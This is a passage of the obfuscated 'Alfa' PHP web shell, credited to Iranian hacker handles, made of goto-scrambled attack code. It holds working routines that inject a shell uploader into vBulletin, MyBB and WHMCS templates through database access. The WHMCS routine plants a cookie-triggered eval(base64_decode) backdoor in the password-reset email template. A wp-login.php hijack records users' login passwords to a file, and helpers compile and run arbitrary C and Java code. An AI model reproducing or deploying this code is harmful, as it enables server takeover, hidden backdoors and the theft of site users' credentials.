<font color='#FFFFFF'>Skype : ehsan.invisible</font><br>
<font color='#FFFFFF'>Skype : sole.sad</font><br>\xd
<font color='#FF0000'>Persian Gulf For Ever</font><br>\xd\xa<font color='#FF0000'>Iranian Hackers :)</font><br>
<font color='#FF0000'>Our Friends : Mr.PERSIA , R3veC0der</font><br>
</center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>"; } goto Ak_7y; r2Yem: alfahead(); goto Q_b8A; Q_b8A: echo "<div class="header"><center><p><div class="txtfont_header">| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick="g('plus',null,'news');">| News | </a><a href=javascript:void(0) onclick="g('plus',null,'tools')">| Tools | </a><a href=javascript:void(0) onclick="g('plus',null,'about')">| About Us | </a></h3></center>"; goto p1Htw; Ak_7y: echo "</div>"; goto TbBml; NtrIZ: } goto Kt2cJ; X_eJR: function bcinit($evalType, $evalCode, $evalOptions, $evalArguments) { goto Sc4De; xTJsh: if ($evalArguments != '') { $evalArguments = " " . $evalArguments; } goto jCtfZ; lqf_c: if ($evalOptions != '') { $evalOptions = $evalOptions . " "; } goto xTJsh; jCtfZ: if ($evalType == "c") { goto XAzXi; JN2sR: if (is_writable($tmpdir)) { goto B6A1X; fuWq3: $path = $filename; goto wOKv0; B6A1X: $uniq = substr(md5(time()), 0, 8); goto L8QSY; L8QSY: $filename = $evalType . $uniq . ".c"; goto fuWq3; wOKv0: if (__write_file($path, $evalCode)) { goto qZdM5; m6200: $evalOptions = "-o " . $pathres . " " . $evalOptions; goto wZhEp; a8ajL: $pathres = $filename . $ext; goto m6200; qZdM5: $ext = $GLOBALS["sys"] == "win" ? ".exe" : ".out"; goto a8ajL; wZhEp: $cmd = "gcc " . $evalOptions . $path; goto uQ40N; h3cKT: if (is_file($pathres)) { if (chmod($pathres, 0755)) { $cmd = $pathres . $evalArguments; alfaEx($cmd); } else { $res = $err; } unlink($pathres); } else { $res = $err; } goto PXVtH; uQ40N: alfaEx($cmd); goto h3cKT; PXVtH: unlink($path); goto WrDg6; WrDg6: } else { $res = $err; } goto yi1fR; yi1fR: } goto Dj69U; Dj69U: return $res; goto SZWpg; dzWxm: chdir($tmpdir); goto JN2sR; XAzXi: $tmpdir = ALFA_TEMPDIR; goto dzWxm; SZWpg: } elseif ($evalType == "java") { goto IrZuL; IrZuL: $tmpdir = ALFA_TEMPDIR; goto NycTm; GZUMq: return $res; goto PhhqF; uHgfB: if (is_writable($tmpdir)) { goto GjB0D; dXpZa: if (__write_file($path, $evalCode)) { goto b_qSQ; R4nC6: alfaEx($cmd); goto Fu8P_; EobKH: unlink($path); goto kSFlY; b_qSQ: $cmd = "javac " . $evalOptions . $path; goto R4nC6; Fu8P_: $pathres = $filename . ".class"; goto Swlec; Swlec: if (is_file($pathres)) { if (chmod($pathres, 0755)) { $cmd = "java " . $filename . $evalArguments; alfaEx($cmd); } else { $res = $err; } unlink($pathres); } else { $res = $err; } goto EobKH; kSFlY: } else { $res = $err; } goto ObySz; SZdKZ: $path = $filename . ".java"; goto dXpZa; GjB0D: if (preg_match("/class\ ([^{]+){/i", $evalCode, $r)) { $classname = trim($r[1]); $filename = $classname; } else { goto FSAOb; FSAOb: $uniq = substr(md5(time()), 0, 8); goto xQys9; xQys9: $filename = $evalType . $uniq; goto NyfNZ; NyfNZ: $evalCode = "class " . $filename . " { " . $evalCode . " } "; goto zCTjp; zCTjp: } goto SZdKZ; ObySz: } goto GZUMq; NycTm: chdir($tmpdir); goto uHgfB; PhhqF: } goto Uz2RH; Uz2RH: return false; goto TAJlo; KgpY9: $err = "<font color='red'>[ Failed...! ]</font>"; goto lqf_c; Sc4De: $res = "<font color='green'>[ Success...! ]</font>"; goto KgpY9; TAJlo: } goto UqiuZ; FNPc5: function alfaShellInjectors() { goto ICA1W; NyKW6: if (isset($_POST["alfa3"]) && $_POST["alfa3"] == "vb") { goto dPd7J; dPd7J: AlfaNum(1, 2, 7, 9, 10); goto pn53k; pn53k: echo __pre() . "<p><div class="txtfont_header">| vbulletin |</div></p><p>" . getConfigHtml("vb") . "</p><form name="frm" method="POST" onsubmit="g('ShellInjectors',null,null,this.lo.value,'vb',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">"; goto QP6Fn; W9BAS: create_table($table); goto YPeuE; QP6Fn: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Host : ", "inputName" => "lo", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "DataBase Name : ", "inputName" => "db", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "User Name : ", "inputName" => "user", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Password : ", "inputName" => "pass", "id" => "db_pw", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix : ", "inputName" => "tab", "id" => "db_prefix", "inputValue" => '', "inputSize" => "50")); goto W9BAS; Fa1db: if (isset($_POST["alfa4"]) && !empty($_POST["alfa4"])) { goto BA2F4; VrVP5: $rec = "select `template` from " . $_POST["alfa6"] . "template WHERE title ='faq'"; goto DWkG3; dwYgC: $realpath = parse_url($saveval, PHP_URL_PATH); goto E5J1a; SFGl3: if ($res) { $ff = "http://" . $realurl . $realpath . "/solevisible.php"; output($ff); } else { goto h9gCz; czwCT: $fff = "http://" . $realurl . $realpath . "/solevisible.php"; goto fFp7H; h9gCz: $ff = "http://" . $realurl . $realpath . "/faq.php"; goto czwCT; fFp7H: echo "<center><p><font color="#FFFFFF">First Open This Link => </font><a href='" . $ff . "' target='_blank'>" . $ff . "</a><br/><font color="#FFFFFF">Second Open This Link => </font><a href='" . $fff . "' target='_blank'>" . $fff . "</a></center></p>"; goto VtTFr; VtTFr: } goto vxPH1; BA2F4: $method = $_POST["alfa8"]; goto KvSh1; oXBjc: $conn = @mysqli_connect($_POST["alfa2"], $_POST["alfa4"], $_POST["alfa5"], $_POST["alfa7"]) or die(@mysqli_error($conn)); goto VrVP5; MxnB5: $getval = @mysqli_fetch_assoc($geturl); goto yUZA_; HrRjN: $ka = @mysqli_query($conn, $p) or die(mysqli_error($conn)); goto nFjf7; qp_A4: $AlfaCurl = new AlfaCURL(); goto PDL2V; nFjf7: $geturl = @mysqli_query($conn, "select `value` from " . $_POST["alfa6"] . "setting WHERE `varname`='bburl'"); goto MxnB5; tp2KM: $p = "UPDATE " . $_POST["alfa6"] . "template SET `template`='" . $code . "' WHERE `title`='faq'"; goto HrRjN; Tk43Y: $code = str_replace("'", "\'", $code); goto tp2KM; KvSh1: $code = "{${" . ALFA_UPLOADER . "}}{${exit()}}&"; goto oXBjc; PDL2V: if (extension_loaded("sockets") && function_exists("fsockopen") && $method == "auto") { if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) { goto DurBS; gfHhH: @fputs($fsock, "Connection: close\xd

"); goto NTB2x; Uofcb: @fputs($fsock, "HOST: {$realurl}
"); goto gfHhH; DurBS: @fputs($fsock, "GET {$realpath}/faq.php HTTP/1.1\xd\xa"); goto Uofcb; Bjyqn: @fclose($fsock); goto mW7E8; XfFtu: if (preg_match("/200 OK/i", $check)) { goto EHV9X; jE7RS: $res = true; goto VmwCm; zdv_y: $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn)); goto jE7RS; EHV9X: $p1 = "UPDATE " . $_POST["alfa6"] . "template SET template ='" . str_replace("'", "\'", $savetoass) . "' WHERE title ='faq'"; goto zdv_y; VmwCm: } goto Bjyqn; NTB2x: $check = fgets($fsock); goto XfFtu; mW7E8: } } elseif (function_exists("curl_version") && $method == "auto") { goto HssIh; bww1q: $res = true; goto YWkCO; HssIh: $AlfaCurl->Send($realurl . $realpath . "/faq.php"); goto Otliy; Otliy: $p1 = "UPDATE " . $_POST["alfa6"] . "template SET template ='" . str_replace("'", "\'", $savetoass) . "' WHERE title ='faq'"; goto hZ1z4; hZ1z4: $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn)); goto bww1q; YWkCO: } goto SFGl3; guSlC: $savetoass = $getd["template"]; goto Tk43Y; LmxYU: $realurl = parse_url($saveval, PHP_URL_HOST); goto dwYgC; DWkG3: $recivedata = @mysqli_query($conn, $rec); goto LTHJX; E5J1a: $res = false; goto qp_A4; yUZA_: $saveval = $getval["value"]; goto LmxYU; LTHJX: $getd = @mysqli_fetch_assoc($recivedata); goto guSlC; vxPH1: } goto Y3ZuC; YPeuE: echo $selector; goto oaHss; oaHss: echo "<p><input type="submit" value=" " /></p></form></center>"; goto Fa1db; Y3ZuC: } goto BU8np; BU8np: echo "</div>"; goto OUB70; BV_ep: echo "<div class=header>"; goto FpYT6; wqwMm: if (isset($_POST["alfa1"]) && $_POST["alfa1"] == "whmcs") { goto zjzkq; zhTpe: echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>"; goto GVAwK; zjzkq: AlfaNum(); goto z8E5_; UKZ2h: echo $selector; goto zhTpe; GVAwK: if (isset($_POST["alfa6"])) { goto x0ai8; HIhAF: $index = "{php}" . ALFA_UPLOADER . ";{/php}"; goto zX_zs; x0ai8: $dbu = $_POST["alfa6"]; goto T1ivw; zX_zs: $newin = str_replace("'", "\'", $index); goto id3LB; T1ivw: $dbn = $_POST["alfa7"]; goto qJ3nQ; goHAn: if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) { if (filter_var($path, FILTER_VALIDATE_URL)) { goto a_FIU; AAhj2: $soleSave = mysqli_query($conn, "select message from tblemailtemplates where name='Password Reset Validation'"); goto cwDih; JpcOy: $tempSave = str_replace("'", "\'", $tempSave1); goto TjMP_; tsgR4: $result2 = mysqli_query($conn, $create) or die(mysqli_error($conn)); goto tbTE3; a_FIU: $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn)); goto AAhj2; x_Sq0: $create = "insert into tblclients (email) values('[email protected]')"; goto tsgR4; IsUix: $tempSave1 = $soleGet["message"]; goto JpcOy; tbTE3: if (function_exists("curl_version") && $method == "auto") { goto kmREu; PN0I5: $AlfaSole->Send($path . "/pwreset.php", "post", "token={$token[1]}&action=reset&[email protected]"); goto rrA5n; G3awu: $ff = "http://" . $path . "/solevisible.php"; goto OHnCG; cvixk: $getToken = preg_match("/name="token" value="(.*?)"/i", $saveurl, $token); goto PN0I5; q64Sm: $saveurl = $AlfaSole->Send($path . "/pwreset.php"); goto cvixk; ZV1Go: __alert("shell injectet..."); goto G3awu; rrA5n: $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'"; goto iWKON; iWKON: $Solevisible = mysqli_query($conn, $backdata) or die(mysqli_error($conn)); goto ZV1Go; kmREu: $AlfaSole = new AlfaCURL(true); goto q64Sm; OHnCG: output($ff); goto c9VjN; c9VjN: } else { echo "<br><pre id="strOutput" style="margin-top:5px" class="ml1"><br><center><b><font color="#FFFFFF">Please go to Target => </font><a href='" . $path . "/pwreset.php' target='_blank'>" . $path . "/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>[email protected]</font><br/><font color='#FFFFFF'>And Go To => </font><a href='" . $path . "/solevisible.php' target='_blank'>" . $path . "/solevisible.php</a></b></center><br><br>"; } goto blIri; cwDih: $soleGet = mysqli_fetch_assoc($soleSave); goto IsUix; ejy58: $result = mysqli_query($conn, $inject) or die(mysqli_error($conn)); goto x_Sq0; TjMP_: $inject = "UPDATE tblemailtemplates SET message='{$newindex}' WHERE name='Password Reset Validation'"; goto ejy58; blIri: } else { __alert("Path is not Valid..."); } } goto viKj9; j1qZ5: $dbh = $_POST["alfa9"]; goto iTKQ3; id3LB: $newindex = "<p>Dear {$newin},</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href="{$pw_reset_url}">{$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{$signature}</p>{php}if($_COOKIE["sec"] == "123"){eval(base64_decode($_COOKIE["sec2"])); die("!");}{\/php}"; goto goHAn; iTKQ3: $path = $_POST["alfa10"]; goto R76WF; qJ3nQ: $dbp = $_POST["alfa8"]; goto j1qZ5; R76WF: $method = $_POST["alfa4"]; goto HIhAF; viKj9: } goto i5QMN; OWsj3: create_table($table); goto UKZ2h; z8E5_: echo __pre() . "<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>" . getConfigHtml("whmcs") . "</p><form onSubmit="g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;" method='post'>"; goto vM3Vm; vM3Vm: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Path WHMCS Url : ", "inputName" => "path", "inputValue" => "http://site.com/whmcs", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "Mysql Host : ", "inputName" => "dbh", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "Db Name : ", "inputName" => "dbn", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Db User : ", "inputName" => "dbu", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Db Pass : ", "inputName" => "dbp", "id" => "db_pw", "inputValue" => '', "inputSize" => "50")); goto OWsj3; i5QMN: } goto gGS7S; ICA1W: alfahead(); goto BV_ep; UJyjv: echo "<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g('ShellInjectors',null,'whmcs',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g('ShellInjectors',null,null,'mybb')">| MyBB | </a><a href=javascript:void(0) onclick="g('ShellInjectors',null,null,null,'vb')">| vBulletin |</a></h3></center>"; goto kDey6; OUB70: alfafooter(); goto LXc1j; gGS7S: if (isset($_POST["alfa2"]) && $_POST["alfa2"] == "mybb") { goto VZ02T; hxOmN: create_table($table); goto V9wiV; V9wiV: echo $selector; goto vjfgk; Pmvma: if (isset($_POST["alfa6"])) { goto sQrez; sQrez: $dbu = $_POST["alfa6"]; goto DztLc; pdOO7: $prefix = $_POST["alfa10"]; goto yCNkX; JsdGr: $dbp = $_POST["alfa8"]; goto wIKyM; fe2ux: $shellCode = "{${" . ALFA_UPLOADER . "}}"; goto EnTo7; EnTo7: $newinshell = str_replace("'", "\'", $shellCode); goto k6BX5; yCNkX: $method = $_POST["alfa4"]; goto fe2ux; wIKyM: $dbh = $_POST["alfa9"]; goto pdOO7; DztLc: $dbn = $_POST["alfa7"]; goto JsdGr; k6BX5: if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)) { goto nKNaB; tnC70: $GetTemp = mysqli_fetch_assoc($result); goto E0N3H; AXKZs: $repsave = str_replace("'", "\'", $repsave); goto rimjt; X13Gh: $findurl = mysqli_query($conn, $geturl) or die(mysqli_error($conn)); goto k4WL3; GOdno: if ($res) { $ff = "http://" . $realurl . $realpath . "/solevisible.php"; output($ff); } else { goto m7jtd; m7jtd: $ff = "http://" . $realurl . $realpath . "/calendar.php"; goto NleIw; NleIw: $fff = "http://" . $realurl . $realpath . "/solevisible.php"; goto Y96be; Y96be: echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='" . $ff . "' target='_blank'>" . $ff . "</a><br/><font color='#FFFFFF'>And Go To => </font><a href='" . $fff . "' target='_blank'>" . $fff . "</a></b></center><br><br>"; goto UgKUx; UgKUx: } goto ZElJ2; L2X2n: $result = mysqli_query($conn, $inject) or die(mysqli_error($conn)); goto tnC70; qsEtj: $realurl = parse_url($furl, PHP_URL_HOST); goto Ci6B_; E0N3H: $saveDate = $GetTemp["template"]; goto sAnRk; dk3Lt: $inject = "select template from {$prefix}templates where  title= 'calendar'"; goto L2X2n; Ci6B_: $realpath = parse_url($furl, PHP_URL_PATH); goto k5Huh; I2inw: if (extension_loaded("sockets") && function_exists("fsockopen") && $method == "auto") { if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) { goto eSY_J; P129r: @fputs($fsock, "Connection: close

"); goto IAmZD; cK8_1: if (preg_match("/200 OK/i", $check)) { goto uOHSn; GX5Ww: $res = true; goto hi6rk; pvjD6: $clear = mysqli_query($conn, $repairdbtemp) or die(mysqli_error($conn)); goto GX5Ww; uOHSn: $repairdbtemp = "update {$prefix}templates SET template= '{$repsave}' where title = 'calendar'"; goto pvjD6; hi6rk: } goto mSYw4; eSY_J: @fputs($fsock, "GET {$realpath}/calendar.php HTTP/1.1
"); goto l9iMN; IAmZD: $check = fgets($fsock); goto cK8_1; mSYw4: @fclose($fsock); goto byAr3; l9iMN: @fputs($fsock, "HOST: {$realurl}
\xa"); goto P129r; byAr3: } } elseif (function_exists("curl_version") && $method == "auto") { $AlfaCurl->Send($realurl . $realpath . "/calendar.php"); $res = true; } goto GOdno; rimjt: $createShell = "update {$prefix}templates SET template= '" . $newinshell . $repsave . "' where title = 'calendar'"; goto Oc_9v; S49FY: $furl = $rowb["value"]; goto qsEtj; k4WL3: $rowb = mysqli_fetch_assoc($findurl); goto S49FY; pTN34: $AlfaCurl = new AlfaCURL(); goto I2inw; nKNaB: $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn)); goto dk3Lt; sAnRk: $repsave = str_replace($shellCode, '', $saveDate); goto AXKZs; Oc_9v: $result2 = mysqli_query($conn, $createShell) or die(mysqli_error($conn)); goto oFXs2; k5Huh: $res = false; goto pTN34; oFXs2: $geturl = "select value from {$prefix}settings where name= 'bburl'"; goto X13Gh; ZElJ2: } goto aQgeW; aQgeW: } goto YoroH; vjfgk: echo "<p><input type=submit value=' '></p></form></center></center>"; goto Pmvma; lc1Fm: echo __pre() . "<p><div class='txtfont_header'>| MyBB |</div></p><center><center>" . getConfigHtml("mybb") . "<form id='sendajax' onSubmit="g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;" method=POST>
"; goto ROb0t; VZ02T: AlfaNum(1, 2, 3, 5); goto lc1Fm; ROb0t: $table = array("td1" => array("color" => "FFFFFF", "tdName" => "Host : ", "inputName" => "dbh", "id" => "db_host", "inputValue" => "localhost", "inputSize" => "50"), "td2" => array("color" => "FFFFFF", "tdName" => "DataBase Name : ", "inputName" => "dbn", "id" => "db_name", "inputValue" => '', "inputSize" => "50"), "td3" => array("color" => "FFFFFF", "tdName" => "User Name : ", "inputName" => "dbu", "id" => "db_user", "inputValue" => '', "inputSize" => "50"), "td4" => array("color" => "FFFFFF", "tdName" => "Password : ", "inputName" => "dbp", "id" => "db_pw", "inputValue" => '', "inputSize" => "50"), "td5" => array("color" => "FFFFFF", "tdName" => "Table Prefix : ", "inputName" => "prefix", "id" => "db_prefix", "inputValue" => "mybb_", "inputSize" => "50")); goto hxOmN; YoroH: } goto NyKW6; kDey6: $selector = "<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>"; goto wqwMm; FpYT6: AlfaNum(11); goto UJyjv; LXc1j: } goto pMl2A; nJoUD: if (!$XDmfxOnhck("bas" . "e" . "6" . "4_e" . "ncod" . "e" . '')) { goto L11Z1; ef87e: function charCodeAt($data, $char) { return ord(substr($data, $char, 1)); } goto gqRBx; L11Z1: function nIWUkxhnhj($data) { goto d7riX; LSAKV: $ac = 0; goto LyJd4; C5i4J: $r = strlen($data) % 3; goto vdsw3; dcdZ0: $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0; goto LSAKV; ybJZT: $enc = implode($tmp_arr, ''); goto C5i4J; izOtq: $tmp_arr = array(); goto bludC; d7riX: if (empty($data)) { return; } goto OK7KO; OK7KO: $b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; goto dcdZ0; bludC: if (!$data) { return $data; } goto LcRHi; LyJd4: $enc = ''; goto izOtq; vdsw3: return ($r ? substr($enc, 0, $r - 3) : $enc) . substr("===", $r || 3); goto Wg4lA; LcRHi: do { $o1 = $RxPWPyQqTL($data, $i++); $o2 = $RxPWPyQqTL($data, $i++); $o3 = $RxPWPyQqTL($data, $i++); $bits = $o1 << 16 | $o2 << 8 | $o3; $h1 = $bits >> 18 & 0x3f; $h2 = $bits >> 12 & 0x3f; $h3 = $bits >> 6 & 0x3f; $h4 = $bits & 0x3f; $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4); } while ($i < strlen($data)); goto ybJZT; Wg4lA: } goto ef87e; gqRBx: function charAt($data, $char) { return substr($data, $char, 1); } goto KxZcj; KxZcj: } else { function nIWUkxhnhj($s) { $b = "bas" . "e" . "6" . "4_e" . "ncod" . "e" . ''; return $b($s); } } goto ZNx0t; FRE53: function hijackwp($path, $saveto) { goto W4zz0; wRXbW: if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $redirect_wp)) { goto q0DYc; jMTm_: @file_put_contents($login, $login_replace); goto iVSn1; iVSn1: hijackOutput(0, $saveto); goto VelxB; q0DYc: $login_replace = str_replace($redirect_wp, $evil_login, $data_login); goto jMTm_; VelxB: } else { hijackOutput(1); } } else { hijackOutput(1); } goto tCMl9; W4zz0: $code = "$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST['log']." : ".$_POST['pwd']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);"; goto vG8sW; Imfat: $evil_login = "\x9" . $redirect_wp . "
	" . $code; goto wRXbW; vG8sW: $redirect_wp = "if ( !is_wp_error($user) && !$reauth ) {"; goto DkwbG; nZA8I: $login = $path . "/wp-login.php"; goto Imfat; DkwbG: $code = str_replace("{saveto_path}", $saveto, $code); goto nZA8I; tCMl9: } goto IAq2M; c9DPC: function _alfa_is_writable($file) { goto RmgAX; RmgAX: $check = false; goto e2_yr; YaDjr: if (!$check) { if (_alfa_can_runCommand()) { $check = alfaEx("[ -w "" . trim(addslashes($file)) . "" ] && echo "yes" || echo "no""); if ($check == "yes") { $check = true; } else { $check = false; } } } goto xWZt4; e2_yr: $check = @is_writable($file); goto YaDjr; xWZt4: return $check; goto jYzSy; jYzSy: } goto wg5vJ; V21nO: define("__ALFA_POST_ENCRYPTION__", isset($GLOBALS["DB_NAME"]["post_encryption"]) && $GLOBALS["DB_NAME"]["post_encryption"] == true ? true : false); goto G7kow; OG2z8: function _alfa_can_runCommand($cgi = true, $cache = true) { goto o_fB4; o_fB4: if (isset($_SESSION["alfa_canruncmd"]) && $cache) { return true; } goto VBncL; VBncL: if (strlen(alfaEx("whoami", false, $cgi)) > 0) { $_SESSION["alfa_canruncmd"] = true; return true; } goto T7si9; T7si9: return false; goto gE_S7; gE_S7: } goto MYobS; i_Ftg: $default_use_ajax = true; goto PTOoj; lrZ3X: function Alfa_Searcher($dir, $ext, $method) { if (@is_readable($dir)) { goto wZXA_; AusXD: foreach ($globDirs as $dir) { if (!@is_readable($dir)) { continue; } @Alfa_Searcher($dir, $ext, $method); } goto lD1Yo; wZXA_: if ($method == "all") { $ext = "*"; } goto bj8y1; h12BG: $blacklist = array(); goto AusXD; CPUCQ: $globDirs = @glob("{$dir}/*", GLOB_ONLYDIR); goto h12BG; knsMH: unset($blacklist); goto rROzu; Ehkuy: $globFiles = @glob("{$dir}/*.{$ext}"); goto CPUCQ; lD1Yo: switch ($method) { case "files": foreach ($globFiles as $file) { if (@is_writable($file)) { echo "{$file}<br>"; } } break; case "dirs": foreach ($globFiles as $file) { if (@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)) { echo dirname($file) . "<br>"; $blacklist[] = dirname($file); } } break; case "all": foreach ($globFiles as $file) { echo $file . "<br>"; } break; } goto knsMH; bj8y1: if ($method == "dirs") { $ext = "*"; } goto Ehkuy; rROzu: } } goto GQHkz; K_RmO: function alfaSettings() { goto zVMuV; lGqRF: alfafooter(); goto npFDh; pKl3i: echo "<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g('settings',null,null,null,null,null,null,null,null,'main')">| Generall Setting | </a><a href=javascript:void(0) onclick="g('settings',null,null,null,null,null,null,null,null,'color')">| Change Color | </a></h3></center>"; goto jbtOz; jazRu: echo "</div>"; goto lGqRF; ank54: AlfaNum(6, 7, 8, 9, 10); goto pKl3i; jbtOz: if ($_POST["alfa8"] == "main") { goto yi5bj; Nij5W: $postEnc_html = ''; goto B0zuz; xsLcN: foreach ($penc_array as $key => $val) { $postEnc_html .= "<option value="" . $key . "" " . (!empty($_POST["alfa7"]) && $_POST["alfa7"] == $key ? "selected" : (__ALFA_POST_ENCRYPTION__ && empty($_POST["alfa7"]) ? "selected" : '')) . ">" . $val . "</option>"; } goto tFuT9; dZhUY: if ($_POST["alfa5"] == ">>") { echo __pre(); if (!empty($_POST["alfa3"])) { goto zhC3X; gbbf8: $find_lg = "/'login_page'(.*?),/i"; goto kpJC_; J3j1x: $password = md5($_POST["alfa4"]); goto CnnCf; GKThc: if (!empty($_POST["alfa4"]) && preg_match($find_pw, $data, $e)) { $new = "'pass' => '" . $password . "',"; $data = str_replace($e[0], $new, $data); } goto haESl; Pggbv: if (preg_match($postEnc, $data, $e)) { $new = "'post_encryption' => " . $post_encrypt . ","; $data = str_replace($e[0], $new, $data); } goto zQs2k; e2grQ: $post_encrypt = $_POST["alfa7"]; goto kZWCi; kZWCi: @chdir($GLOBALS["home_cwd"]); goto OzvnE; rPSWO: if (preg_match($icons, $data, $e)) { $new = "'show_icons' => '" . $icon . "',"; $data = str_replace($e[0], $new, $data); } goto Pggbv; RIvNV: $icons = "/'show_icons'(.*?),/i"; goto jPAF0; TgoGf: $data = @file_get_contents($basename); goto y2P_U; haESl: if (!empty($lgpage) && preg_match($find_lg, $data, $e)) { $new = "'login_page' => '" . $lgpage . "',"; $data = str_replace($e[0], $new, $data); } goto UXI2T; UXI2T: if (!empty($find_p) && preg_match($find_p, $data, $e)) { $new = "'safemode' => '" . $protect . "',"; $data = str_replace($e[0], $new, $data); } goto rPSWO; zhC3X: $protect = $_POST["alfa1"]; goto FUvdC; zQs2k: if (@file_put_contents($basename, $data)) { echo "<b>UserName: </b><font color="green"><b>" . $username . "</b></font><br /><b>Password: </b><font color="green"><b>" . $_POST["alfa4"] . "</b></font><script>post_encryption_mode = " . $post_encrypt . ";</script>"; } else { __alert("<span style='color:red;'>File has no edit access...!</span>"); } goto KmZ00; uCNa2: $find_pw = "/'pass'(.*?),/i"; goto gbbf8; zIuSp: $username = $_POST["alfa3"]; goto J3j1x; kpJC_: $find_p = "/'safemode'(.*?),/i"; goto RIvNV; jPAF0: $postEnc = "/'post_encryption'(.*?),/i"; goto lMCsP; lMCsP: if (!empty($username) && preg_match($find_user, $data, $e)) { $new = "'user' => '" . $username . "',"; $data = str_replace($e[0], $new, $data); } goto GKThc; y2P_U: $find_user = "/'user'(.*?),/i"; goto uCNa2; OzvnE: $basename = @basename($_SERVER["PHP_SELF"]); goto TgoGf; FUvdC: $lgpage = $_POST["alfa2"]; goto zIuSp; CnnCf: $icon = $_POST["alfa6"]; goto e2grQ; KmZ00: } else { __alert("<span style='color:red;'>UserName is Empty !</span>"); } } goto VWS3I; B0zuz: $login_html = ''; goto aD6Kg; tFuT9: $lg_array = array("gui" => "GUI", "500" => "500 Internal Server Error", "403" => "403 Forbidden", "404" => "404 NotFound"); goto SQklH; SQklH: foreach ($lg_array as $key => $val) { $login_html .= "<option value="" . $key . "" " . ($GLOBALS["DB_NAME"]["login_page"] == $key ? "selected" : '') . ">" . $val . "</option>"; } goto sIUyL; X0Nv4: echo "<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">" . $protect_html . "</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">" . $postEnc_html . "</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">" . $icon_html . "</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">" . $login_html . "</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="" . (empty($_POST["alfa3"]) ? $GLOBALS["DB_NAME"]["user"] : $_POST["alfa3"]) . "" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="" . $GLOBALS["DB_NAME"]["safemode"] . ""><input type="hidden" name="s" value="" . $GLOBALS["DB_NAME"]["show_icons"] . ""><p><input type="submit" name="btn" value=" "></p></form></center>"; goto dZhUY; DIyOG: $penc_array = array("false" => "No", "true" => "Yes"); goto vcfj2; yi5bj: echo "<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method='post'>"; goto s2F3z; sIUyL: echo ''; goto X0Nv4; vcfj2: $protect_html = ''; goto hhWXE; hhWXE: $icon_html = ''; goto Nij5W; s2F3z: $lg_array = array("0" => "No", 